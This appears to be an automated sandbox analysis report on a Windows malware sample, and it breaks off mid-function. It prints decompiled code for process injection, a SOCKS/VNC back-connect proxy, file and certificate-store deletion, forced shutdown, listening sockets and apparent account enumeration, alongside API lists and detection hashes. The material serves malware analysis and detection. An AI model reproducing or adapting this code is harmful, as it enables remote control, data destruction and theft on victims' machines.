Instruction Fuzzy Hash: 9B11E575800148BFEF119BD4DE88EEE7B7DEB04344F008461F651B11A1D77A9E989B28

Uniqueness

Uniqueness Score: -1.00%

Function 0041ADE1, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041ADE1(void* __ecx, CHAR** _a4, signed int _a7) {
				signed int _v6;
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				short _v30;
				intOrPtr _v36;
				char _v44;
				char _v304;
				char _v788;
				char _v792;
				void* __edi;
				void* __esi;
				int _t68;
				signed short _t70;
				signed int _t80;
				void* _t95;
				signed int _t99;
				void* _t102;
				signed int _t108;
				void* _t112;
				CHAR** _t121;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t138;
				signed int _t139;
				void* _t141;

				_t123 = __ecx;
				E0040C275( &_v304,  &_v304, 0, 0x104);
				_t121 = _a4;
				if(lstrcmpiA( *_t121, ?str?) != 0) {
					_t68 = lstrcmpiA( *_t121, "vnc");
					__eflags = _t68;
					if(_t68 != 0) {
						_t70 = E0040C841( *_t121, _t123, 0);
						_t6 = _t70 - 1; // -1
						_t123 = _t6;
						__eflags = _t6 - 0xfffd;
						if(_t6 > 0xfffd) {
							L32:
							E004102C3( &_v304);
							_a7 = 0;
							if(_v304 <= 0) {
								L34:
								E0040C1C2( *_t121);
								E0040C1C2(_t121[1]);
								E0040C1C2(_t121[2]);
								E0040F995(_t121[3]);
								E0040C1C2(_t121);
								return 0;
							} else {
								goto L33;
							}
							do {
								L33:
								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
								_a7 = _a7 + 1;
							} while (_a7 < _v304);
							goto L34;
						}
						_t80 = _t70 & 0x0000ffff;
						_v24 = _t80;
						__eflags = _t80;
						if(_t80 == 0) {
							goto L32;
						}
						L6:
						_t130 = E0040F24B(E0040C841(_t121[2], _t123, 0), _t123, _t121[1]);
						_v16 = _t130;
						if(_t130 == 0xffffffff) {
							goto L32;
						}
						E0040F5BD(_t123, _t130);
						E0040F57B(_t130);
						_t89 = E0040D019(E00413447(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
						_t144 = _t89;
						if(_t89 == 0) {
							L31:
							E0040F565(_t89, _t130);
							goto L32;
						}
						_v9 = E0041285A( &_v788, _v36, _t144, _t130, 1, _v44);
						_t89 = E0040D007( &_v44);
						if(_v9 == 0) {
							goto L31;
						}
						_t89 = E0040F472(0,  &_v16, 0, 0);
						_t130 = _v16;
						if(_t89 != _t130) {
							goto L31;
						}
						while(1) {
							_push(0x7530);
							_push( &_v8);
							_t95 = 4;
							if(E0040F175(_t95, _t130) == 0 || _v8 <= 4) {
								break;
							}
							_t138 = E0040C192(_v8 & 0x0000ffff);
							_push(0x7530);
							if(_t138 == 0) {
								_t127 = _v8 & 0x0000ffff;
								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
								L29:
								_push(_t99);
								_push(_t130);
								_t89 = E0040F1BD(_t127);
								break;
							}
							_push(_t138);
							_t127 = _t130;
							_t102 = E0040F175((_v8 & 0x0000ffff) - 4, _t130);
							_push(_t138);
							if(_t102 == 0) {
								L35:
								_t89 = E0040C1C2();
								break;
							}
							_v30 = _v6;
							_v28 =  *_t138;
							E0040C1C2();
							if(_v6 != 0) {
								_t139 = E0040C192(_v6 & 0x0000ffff);
								_t99 = _v6 & 0x0000ffff;
								_push(0x7530);
								__eflags = _t139;
								if(_t139 == 0) {
									goto L29;
								}
								_push(_t139);
								_t127 = _t130;
								_t108 = E0040F175(_t99, _t130);
								__eflags = _t108;
								if(_t108 == 0) {
									_push(_t139);
									goto L35;
								}
								_v20 = _t139;
								L20:
								if(_v28 == 2 && _v30 == 4) {
									_t112 = 0xc;
									_t131 = E0040C192(_t112);
									if(_t131 != 0) {
										 *_t131 = _a4;
										 *((intOrPtr*)(_t131 + 4)) = _v24;
										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
										if(E0041027E( &_v304, 0x20000, E0041AB58, _t131) == 0) {
											E0040C1C2(_t131);
										}
									}
									E0041022C(_t127,  &_v304);
								}
								E0040C1C2(_v20);
								_t89 = E0040F472(0,  &_v16, 0, 0);
								_t130 = _v16;
								if(_t89 == _t130) {
									continue;
								} else {
									break;
								}
							}
							_v20 = _v20 & 0x00000000;
							goto L20;
						}
						_t121 = _a4;
						goto L31;
					}
					_v24 = 0xfffffffe;
					goto L6;
				}
				_v24 = _v24 | 0xffffffff;
				goto L6;
			}

0x0041ade1
0x0041adfb
0x0041ae00
0x0041ae14
0x0041ae23
0x0041ae25
0x0041ae27
0x0041ae36
0x0041ae3b
0x0041ae3b
0x0041ae3e
0x0041ae44
0x0041b01d
0x0041b023
0x0041b02f
0x0041b033
0x0041b054
0x0041b056
0x0041b05e
0x0041b066
0x0041b06e
0x0041b074
0x0041b07f
0x00000000
0x00000000
0x00000000
0x0041b035
0x0041b035
0x0041b040
0x0041b046
0x0041b04c
0x00000000
0x0041b035
0x0041ae4a
0x0041ae4d
0x0041ae50
0x0041ae52
0x00000000
0x00000000
0x0041ae58
0x0041ae6a
0x0041ae6c
0x0041ae72
0x00000000
0x00000000
0x0041ae79
0x0041ae7f
0x0041ae9c
0x0041aea1
0x0041aea3
0x0041b016
0x0041b018
0x00000000
0x0041b018
0x0041aeba
0x0041aebd
0x0041aec6
0x00000000
0x00000000
0x0041aed6
0x0041aedb
0x0041aee0
0x00000000
0x00000000
0x0041aeeb
0x0041aeeb
0x0041aeef
0x0041aef2
0x0041aefc
0x00000000
0x00000000
0x0041af16
0x0041af18
0x0041af1b
0x0041b004
0x0041b008
0x0041b00c
0x0041b00c
0x0041b00d
0x0041b00e
0x00000000
0x0041b00e
0x0041af28
0x0041af29
0x0041af2b
0x0041af30
0x0041af33
0x0041b082
0x0041b082
0x00000000
0x0041b082
0x0041af3d
0x0041af43
0x0041af46
0x0041af50
0x0041af61
0x0041af63
0x0041af67
0x0041af68
0x0041af6a
0x00000000
0x00000000
0x0041af70
0x0041af71
0x0041af73
0x0041af78
0x0041af7a
0x0041b089
0x00000000
0x0041b089
0x0041af80
0x0041af83
0x0041af87
0x0041af92
0x0041af98
0x0041af9c
0x0041afa1
0x0041afa6
0x0041afbf
0x0041afc9
0x0041afcc
0x0041afcc
0x0041afc9
0x0041afd7
0x0041afd7
0x0041afdf
0x0041afee
0x0041aff3
0x0041aff8
0x00000000
0x0041affe
0x00000000
0x0041affe
0x0041aff8
0x0041af52
0x00000000
0x0041af52
0x0041b013
0x00000000
0x0041b013
0x0041ae29
0x00000000
0x0041ae29
0x0041ae16
0x00000000

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0041AE10
lstrcmpiA.KERNEL32(?,vnc), ref: 0041AE23
CloseHandle.KERNEL32(?), ref: 0041B040

Part of subcall function 0041027E: SetLastError.KERNEL32(0000009B,00413742,00000000,0041A945,00000000,00423788,00000000,00000104,74B5F560,00000000), ref: 00410288

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

Strings

vnc, xrefs: 0041AE1C
socks, xrefs: 0041AE09

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
String ID: socks$vnc
API String ID: 3305036421-270151703
Opcode ID: c37b2d7255cfd512d08f2cfa3f97230c0f944c898d2bf5b8667f48a5f8568305
Instruction ID: c6b4a8f2f3cb90cd793c2f587852f00a89f179ef24d16b8163d635fed46671c0
Opcode Fuzzy Hash: c37b2d7255cfd512d08f2cfa3f97230c0f944c898d2bf5b8667f48a5f8568305
Instruction Fuzzy Hash: 7A71D471900214AACF21AF65C881BFE7B75AF09314F0441BBF950BB2D2D77C8E859B99

Uniqueness

Uniqueness Score: -1.00%

Function 00411830, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411830(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E00411A47("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0041164C( &(_v596.cFileName)) == 0 && E00411A47( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0041151D( &_v1116);
						} else {
							E00411830( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0041183e
0x00411852
0x004118cd
0x004118d3
0x004118ea
0x004118ea
0x00411867
0x0041186c
0x00000000
0x00000000
0x00000000
0x00000000
0x0041186e
0x0041186e
0x0041187c
0x00411894
0x0041189c
0x004118ae
0x0041189e
0x004118a2
0x004118a2
0x0041189c
0x004118c2
0x004118c7
0x00000000

APIs

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 00411861
FindNextFileW.KERNEL32(00000000,?), ref: 004118BC
FindClose.KERNEL32(00000000), ref: 004118C7
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 004118D3
RemoveDirectoryW.KERNEL32(?), ref: 004118DA

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: 9778db49502af2fdadc6ca77b78660c01a442c90fc026ba53f18238f925da15c
Instruction ID: c3c617e6f763e63337c502c0d662f733537104b500542e2ece54712ad519dd8d
Opcode Fuzzy Hash: 9778db49502af2fdadc6ca77b78660c01a442c90fc026ba53f18238f925da15c
Instruction Fuzzy Hash: 631182710042046AD220FBA4DD49ADF77DCAF85354F04862FFE95D21B1EB389589C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00409B1E, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,0040179C), ref: 00409B29
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 00409B42
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,004138A4), ref: 00409B4D
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00409B55
CertCloseStore.CRYPT32(00000000,00000000), ref: 00409B61

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: f0b6c3931f41711a45b9bb52a3c41cfbdf010be39b2851a2efb9cc43a0996ab0
Instruction ID: 7e73aa0dc1f64ce36ff3f63a7143355b792968e8f8fa8fdec7ff319e70ae7bbe
Opcode Fuzzy Hash: f0b6c3931f41711a45b9bb52a3c41cfbdf010be39b2851a2efb9cc43a0996ab0
Instruction Fuzzy Hash: CBF0A73164125066D71117356D19FB7776CAB42B61B040033F644F32B18E389C85857C

Uniqueness

Uniqueness Score: -1.00%

Function 00416142, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00416142(void* __ebx, void* __ecx) {
				signed int _v124;
				signed char _t12;

				_t12 =  *0x423e78;
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E0040BB02(__ebx, __ecx, __eflags);
						_t12 =  *0x423e78;
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E0040D88E(L"SeShutdownPrivilege");
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x423e78 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E00413E6D( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x4238a0 =  *0x4238a0 | 0x00000010;
						E00413EC5( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

0x00416145
0x0041614f
0x00416174
0x00416176
0x00416178
0x0041617d
0x0041617d
0x00416182
0x00416184
0x004161af
0x004161b1
0x00000000
0x00000000
0x00000000
0x00416186
0x0041618b
0x004161a2
0x004161a7
0x004161ae
0x004161ae
0x00416151
0x00416155
0x0041615c
0x0041615e
0x00416162
0x0041616d
0x004161b3
0x00000000
0x004161ba
0x004161c1
0x004161c1
0x004161c1

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 004161A7

Part of subcall function 00413E6D: CreateMutexW.KERNEL32(004238D8,00000000,00423DF0,?,?,004141C0,?,?,?,743C152E,00000002), ref: 00413E93

ExitWindowsEx.USER32(00000014,80000000), ref: 004161BA

Strings

, xrefs: 0041615E
SeShutdownPrivilege, xrefs: 00416186

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateExitInitiateMutexShutdownSystemWindows
String ID: $SeShutdownPrivilege
API String ID: 3829579691-2253681161
Opcode ID: cf70afd1f6b69feace698a2376e1d0e0fac6feddbbf4c811789bc5a1c28ee17b
Instruction ID: 4fd853fe640b7aa60f8ee8a65211f9a7262512f6f161131cd69188482187018b
Opcode Fuzzy Hash: cf70afd1f6b69feace698a2376e1d0e0fac6feddbbf4c811789bc5a1c28ee17b
Instruction Fuzzy Hash: 20F0867150020479FA20ABB89C07FFA377C9B0174AF590029F991B31A2C66DD586C66D

Uniqueness

Uniqueness Score: -1.00%

Function 00410B1B, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410B1B(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E0040C215(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E0040C1C2(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

0x00410b24
0x00410b29
0x00410b2b
0x00410b30
0x00410b33
0x00410b3f
0x00410b55
0x00410b5b
0x00410b5e
0x00410b60
0x00410c16
0x00000000
0x00410c16
0x00410b6d
0x00410b6f
0x00410b71
0x00410b73
0x00410bff
0x00410c0c
0x00410c12
0x00410c12
0x00410c12
0x00000000
0x00410c12
0x00410b79
0x00410b7f
0x00410bf3
0x00410bf4
0x00410bf9
0x00410bfd
0x00000000
0x00000000
0x00000000
0x00410bfd
0x00410b81
0x00410b87
0x00410b89
0x00000000
0x00000000
0x00410b8b
0x00410b93
0x00410b95
0x00410b98
0x00410bd8
0x00410bd8
0x00410bda
0x00000000
0x00000000
0x00410b9c
0x00410b9f
0x00410ba2
0x00410bd3
0x00410bd3
0x00410bd6
0x00410bd6
0x00000000
0x00410bd6
0x00410ba7
0x00410ba7
0x00410ba9
0x00410bac
0x00000000
0x00000000
0x00000000
0x00000000
0x00410bae
0x00410bae
0x00410bb1
0x00410bb6
0x00410bb9
0x00410bc1
0x00410bc8
0x00410bc8
0x00410bc8
0x00410bc8
0x00410bcb
0x00410bce
0x00410bce
0x00000000
0x00410bae
0x00410be7
0x00410bed
0x00410bef
0x00410bef
0x00410bef
0x00000000
0x00410bef
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000), ref: 00410B37
VirtualAllocEx.KERNEL32(0001FEE6,00000000,?,00003000,00000040), ref: 00410B55
WriteProcessMemory.KERNEL32(0001FEE6,0001FEE6,00000000,00000000,00000000,?,?), ref: 00410BE7
VirtualFreeEx.KERNEL32(0001FEE6,0001FEE6,00000000,00008000,?,?), ref: 00410C0C

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: c1c8eba55998b0a130b1b93797cdd5345c0ac84324f4bee73285edf817fd9e1d
Instruction ID: c2c537b15f723b929b651a7463f33673831d128b4b6dd19ee08c0baf141ae8cd
Opcode Fuzzy Hash: c1c8eba55998b0a130b1b93797cdd5345c0ac84324f4bee73285edf817fd9e1d
Instruction Fuzzy Hash: B631A071E04209AFDB149FA4CD84BEEBBB4EF45749F04806AE505B7291D7B4ADC0CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D837, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D837(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x0040d83f
0x0040d844
0x0040d84a
0x0040d84c
0x0040d851
0x0040d858
0x0040d85f
0x0040d87b
0x0040d86d
0x0040d86f
0x0040d86f
0x0040d875
0x0040d875
0x0040d880
0x00000000
0x0040d886
0x0040d88b

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040D844
Thread32First.KERNEL32 ref: 0040D85F
Thread32Next.KERNEL32 ref: 0040D875
CloseHandle.KERNEL32(00000000), ref: 0040D880

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: b97feac9ef93ceab4f5537c1a1feaa94d204b3a296c246ca7ff4a50e187a03e3
Instruction ID: 9968565df77b1baac6cc33fd8a092b60b0fa8c3a9746ffe8eced6c9d454bb02c
Opcode Fuzzy Hash: b97feac9ef93ceab4f5537c1a1feaa94d204b3a296c246ca7ff4a50e187a03e3
Instruction Fuzzy Hash: F1F08976900115ABDB207BA6DC48DEF7BBCEB85360B008132F922F21D0D734D946CAB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F304, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 0040F30D
bind.WS2_32(00000000,?,-0000001D), ref: 0040F32D
listen.WS2_32(00000000,?), ref: 0040F33C
closesocket.WS2_32(00000000), ref: 0040F347

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: 6148149d5010d6513f2570e3e53f748cb76949004fe90b7c93a4869994f79a59
Instruction ID: 6434e98ee6cfe1293092b05f1791db907e0f394683b25a1768f09193c25f03eb
Opcode Fuzzy Hash: 6148149d5010d6513f2570e3e53f748cb76949004fe90b7c93a4869994f79a59
Instruction Fuzzy Hash: A9F0377260010177D3302F799D4AE6F26A99BC5B71B180735F962E61F0D73894819524

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5E2, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 0040F5EB
bind.WS2_32(00000000,00000017,-0000001D), ref: 0040F60B
closesocket.WS2_32(00000000), ref: 0040F616

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: 91eb9c8734cb82417d5688b89156182ba99b7e5738ea4380e2f96627acc82d2a
Instruction ID: b0e97748fa6d1c419ffa3ffc0557239390a17fbf07d2c4f765a4cddc5f192a7b
Opcode Fuzzy Hash: 91eb9c8734cb82417d5688b89156182ba99b7e5738ea4380e2f96627acc82d2a
Instruction Fuzzy Hash: B3E0483220151066D2201B39BD4EE6F25A99BC57717580735B572E71F1D77888C29124

Uniqueness

Uniqueness Score: -1.00%

Function 004179CD, Relevance: 1.7, APIs: 1, Instructions: 209
comCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004179CD() {
				void* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v132;
				void* _v388;
				void* _v644;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t60;
				intOrPtr* _t69;
				intOrPtr* _t71;
				signed int _t72;
				intOrPtr* _t73;
				intOrPtr* _t75;
				signed int _t76;
				intOrPtr* _t80;
				signed int _t81;
				void* _t85;
				void* _t87;
				void* _t91;
				void* _t94;
				void* _t100;
				void* _t106;
				intOrPtr* _t112;
				signed int _t114;
				intOrPtr _t122;
				void* _t123;
				void* _t130;
				void* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				void* _t141;

				_t60 =  &_v32;
				_t114 = 0;
				_v32 = 0;
				__imp__CoCreateInstance(0x404abc, 0, 0x4401, 0x404acc, _t60);
				if(_t60 != 0) {
					L3:
					_v20 = _t114;
					_t133 = _t114;
					L4:
					if(_t133 == _t114) {
						return _t60;
					}
					_push(1);
					_push(_t114);
					_push(_t133);
					_v12 = _t114;
					if( *((intOrPtr*)( *_t133 + 0x40))() != 0) {
						L33:
						 *((intOrPtr*)( *_t133 + 8))(_t133);
						_push(0xcc);
						return E00417504(_t126, _v12, 0x3e);
					}
					_push( &_v28);
					_push(0xe);
					_push(_t133);
					if( *((intOrPtr*)( *_t133 + 0x14))() != 0) {
						goto L33;
					}
					while(1) {
						_t69 = _v28;
						_t126 =  &_v8;
						_push( &_v8);
						_push(_t69);
						if( *((intOrPtr*)( *_t69 + 0x14))() != 0) {
							break;
						}
						_t71 = _v8;
						_t72 =  *((intOrPtr*)( *_t71 + 0x38))(_t71,  &_v16);
						__eflags = _t72;
						if(_t72 == 0) {
							__eflags = _v16 - _t114;
							if(_v16 != _t114) {
								_t75 = _v8;
								_t76 =  *((intOrPtr*)( *_t75 + 0x14))(_t75, 0x123503f0,  &_v388, 0x100);
								__eflags = _t76;
								if(_t76 == 0) {
									__eflags =  &_v388 | 0xffffffff;
									_v24 = E0040C402( &_v388 | 0xffffffff, _t114,  &_v388);
								} else {
									_v24 = _t114;
								}
								_t80 = _v8;
								_t81 =  *((intOrPtr*)( *_t80 + 0x14))(_t80, 0x143203f0,  &_v644, 0x100);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  &_v644 | 0xffffffff;
									_t132 = E0040C402( &_v644 | 0xffffffff, _t114,  &_v644);
								} else {
									_t132 = 0;
								}
								_t85 = 0x4a;
								E004128DB(_t85,  &_v132);
								_t87 = 0x4019b0;
								_t130 = 0x4019b0;
								__eflags = _t132 - _t114;
								if(_t132 != _t114) {
									_t130 = _t132;
								}
								_t122 = _v24;
								_t136 = _v12;
								__eflags = _t122 - _t114;
								_t123 =  ==  ? _t87 : _t122;
								__eflags = _t136 - _t114;
								if(_t136 != _t114) {
									__eflags =  *_t136 - _t114;
									if( *_t136 != _t114) {
										_t87 = 0x404b2c;
									}
								}
								_push(_t130);
								_push(_t123);
								_t91 = E0040CF43( &_v12, E0040CD11(_t136), _t136, __eflags,  &_v132, _t87);
								_t141 = _t141 + 0x10;
								E0040C1C2(_v24);
								E0040C1C2(_t132);
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									_t30 =  &_v16;
									 *_t30 = _v16 & 0x00000000;
									__eflags =  *_t30;
								}
								__eflags = _v16 & 0x00000002;
								if((_v16 & 0x00000002) != 0) {
									_t106 = 0x53;
									E004128DB(_t106,  &_v68);
									E0041788D(_v8,  &_v68, 0x129803f0, 0x129d03e9, 0x129e03f5, 0x129903f0, 0x129a03f6,  &_v12);
								}
								__eflags = _v16 & 0x00000004;
								if((_v16 & 0x00000004) != 0) {
									_t100 = 0x52;
									E004128DB(_t100,  &_v56);
									E0041788D(_v8,  &_v56, 0x13c403f0, 0x13c903e9, 0x13ca03f5, 0x13c503f0, 0x13c603f6,  &_v12);
								}
								__eflags = _v16 & 0x00000008;
								if((_v16 & 0x00000008) != 0) {
									_t94 = 0x51;
									E004128DB(_t94,  &_v44);
									E0041788D(_v8,  &_v44, 0x142803f0, 0x142d03e9, 0x142e03f5, 0x142903f0, 0x142a03f6,  &_v12);
								}
								_t133 = _v20;
								_t114 = 0;
								__eflags = 0;
							}
						}
						_t73 = _v8;
						 *((intOrPtr*)( *_t73 + 8))(_t73);
					}
					_t112 = _v28;
					 *((intOrPtr*)( *_t112 + 8))(_t112);
					goto L33;
				}
				_t133 = _v32;
				if(_t133 == 0) {
					goto L3;
				} else {
					_v20 = _t133;
					goto L4;
				}
			}

0x004179d9
0x004179e7
0x004179ef
0x004179f2
0x004179fa
0x00417a08
0x00417a08
0x00417a0b
0x00417a0d
0x00417a0f
0x00417c1d
0x00417c1d
0x00417a17
0x00417a19
0x00417a1a
0x00417a1b
0x00417a23
0x00417c03
0x00417c06
0x00417c0c
0x00000000
0x00417c14
0x00417a2e
0x00417a2f
0x00417a31
0x00417a37
0x00000000
0x00000000
0x00417be5
0x00417be5
0x00417bea
0x00417bed
0x00417bee
0x00417bf4
0x00000000
0x00000000
0x00417a42
0x00417a4c
0x00417a4f
0x00417a51
0x00417a57
0x00417a5a
0x00417a60
0x00417a78
0x00417a7b
0x00417a7d
0x00417a8c
0x00417a94
0x00417a7f
0x00417a7f
0x00417a7f
0x00417a97
0x00417aaa
0x00417aad
0x00417aaf
